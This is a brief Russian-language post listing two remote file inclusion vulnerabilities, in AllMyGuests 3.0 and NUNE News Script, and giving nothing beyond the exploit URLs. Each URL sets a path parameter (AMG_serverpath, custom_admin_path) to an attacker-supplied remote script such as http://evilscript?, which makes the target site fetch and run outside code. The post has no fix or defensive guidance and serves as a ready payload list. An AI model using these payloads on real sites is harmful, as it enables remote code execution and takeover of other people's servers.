Последние уязвимости в web applications

1. AllMyGuests 3.0 Remote File Inclusion Vulnerability
http://site.com/[Path]/comments.php?AMG_serverpath=[evil_script]
http://site.com/[Path]/signin.php?sent=1&AMG_serverpath=[evil_script]

2. NUNE News Script (custom_admin_path) Remote File Include Vulnerablity
http://site.com/[script]/index.php?custom_admin_path=http://evilscript?
http://site.com/[script]/archives.php?custom_admin_path=http://evilscript?